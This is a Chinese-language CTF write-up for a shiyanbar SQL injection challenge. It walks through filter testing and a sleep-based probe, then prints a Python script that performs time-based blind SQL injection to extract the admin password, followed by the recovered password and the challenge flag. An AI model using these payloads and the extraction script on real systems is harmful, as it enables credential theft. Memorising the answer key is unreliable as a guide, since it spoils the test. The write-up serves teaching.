看起来有点难

原题链接

http://ctf5.shiyanbar.com/basic/inject/index.php

分析

测试?admin=1&pass=1&action=login报错，无法连接到数据库

测试?admin=admin'&pass=admin&action=login，报错，密码错误

这或许说明，admin=admin只要知道密码就行了。
这里本想直接用爆破，但是听说密码不是那种弱口令，或者字典的，就停了。。

还是回归sql注入。
注入点应该还是admin字段，测试一下过滤，试了一下?admin=admin' union select 1,2,3 --+&pass=admin&action=login

弹窗警告了！然后过滤了select，剩下的burp fuzz
过滤字符

空格 select

双写大小写绕不过去，而且并没有报错信息

http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin%27exp(~0)%20--+%20&pass=admin&action=login
admin'exp(~0) -- 

测试?admin=admin' and sleep(5) --+发现延时了。

于是只能使用时间盲注。

#coding:utf-8
import requests
import string

str = string.ascii_lowercase+string.digits+'@_{}.*'
#print str
flag=""
print "start:"
# ## length 先爆出字段长度
# for i in range(1,20):
#   url = "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin' and case when(length(password)=%s) then sleep(8) else sleep(0) end and ''='&pass=&action=login" %i
#   try:
#       res = requests.get(url, timeout=5)
#   except:
#       print "length:%s" % i
#       break
###start:
###length:8


for i in range(1,9):
    for s in str:
        url = "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin' and case when(substr(password,%s,1)='%s') then sleep(8) else sleep(0) end and ''='&pass=&action=login" %(i,s)
        try:
            res = requests.get(url, timeout=5)
        except:
            flag += s
            print "%s:%s"  %(i,flag)
            break
print "done.pass:"+flag

运行结果

start:
1:i
2:id
3:idn
4:idnu
5:idnue
6:idnuen
7:idnuenn
8:idnuenna
done.pass:idnuenna
[Finished in 120.3s]

得到密码idnuenna
登陆得到flag
恭喜你密码正确！ KEY :!@#WwwN5f0cu5coM

flag

!@#WwwN5f0cu5coM

知识点

sql时间盲注